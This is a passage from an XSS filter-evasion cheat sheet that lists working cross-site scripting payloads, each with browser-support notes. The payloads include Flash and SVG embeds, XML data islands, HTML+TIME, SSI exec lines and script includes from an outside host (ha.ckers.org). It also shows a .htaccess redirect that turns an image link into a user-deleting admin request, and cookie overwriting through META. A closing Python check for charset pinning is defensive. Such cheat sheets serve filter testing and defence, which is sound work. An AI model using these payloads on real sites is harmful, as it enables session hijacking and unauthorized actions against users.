Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Using ActionScript inside flash can obfuscate your XSS vector:

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

XML namespace. The htc file must be located on the same server as your XSS vector:

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by SEC Consult while auditing Yahoo:

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive):

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

PHP requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG Embedded commands - this works when the web page where this is injected (like a web board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
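The precondition for the UTF-7 entry is a response that never pins its character set, leaving the browser to guess. The added example below, which is not code from the cheat sheet, is the check a defender would run over a response: it looks for a charset in the Content-Type header first and in <meta> tags second, and treats a page as unpinned when no charset is declared or when the declared one is UTF-7. Names (MetaCharset, charset_from_content_type, declared_charset, charset_is_pinned) are my own, and the responses used in the test are constructed; the UTF-7 meta tag is the sheet's own.

```python
"""Charset pinning check for an HTTP response (added example, not from the
cheat sheet). Takes headers already split into a dict and the body as text."""
from html.parser import HTMLParser


def charset_from_content_type(value):
    """Return the charset parameter of a Content-Type value, lowercased,
    or None when the value carries no charset."""
    for part in value.split(";")[1:]:
        name, _, val = part.strip().partition("=")
        if name.strip().lower() == "charset":
            return val.strip().strip('"').lower()
    return None


class MetaCharset(HTMLParser):
    """Collect charset declarations from <meta charset=...> and from
    <meta http-equiv="Content-Type" content="...; charset=...">."""

    def __init__(self):
        super().__init__()
        self.charsets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        # attribute names arrive lowercased; values may be None
        a = {name: (value or "") for name, value in attrs}
        if "charset" in a:
            self.charsets.append(a["charset"].strip().lower())
        elif a.get("http-equiv", "").lower() == "content-type":
            cs = charset_from_content_type(a.get("content", ""))
            if cs:
                self.charsets.append(cs)


def declared_charset(headers, body):
    """Effective charset: the header wins over any <meta>; None if neither
    declares one (the case where the browser falls back to sniffing)."""
    lowered = {name.lower(): value for name, value in headers.items()}
    cs = charset_from_content_type(lowered.get("content-type", ""))
    if cs:
        return cs
    parser = MetaCharset()
    parser.feed(body)
    parser.close()
    return parser.charsets[0] if parser.charsets else None


def charset_is_pinned(headers, body):
    """True only when a charset is declared and it is not UTF-7."""
    cs = declared_charset(headers, body)
    return cs is not None and cs != "utf-7"


if __name__ == "__main__":
    # Constructed response: content-type without charset, body with no meta.
    print(charset_is_pinned({"Content-Type": "text/html"}, "<html><body>hi</body></html>"))
```

The fix on the server side is the usual one: always send Content-Type with an explicit charset (UTF-8) so the meta tag, which an attacker may be able to influence, never gets a say.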
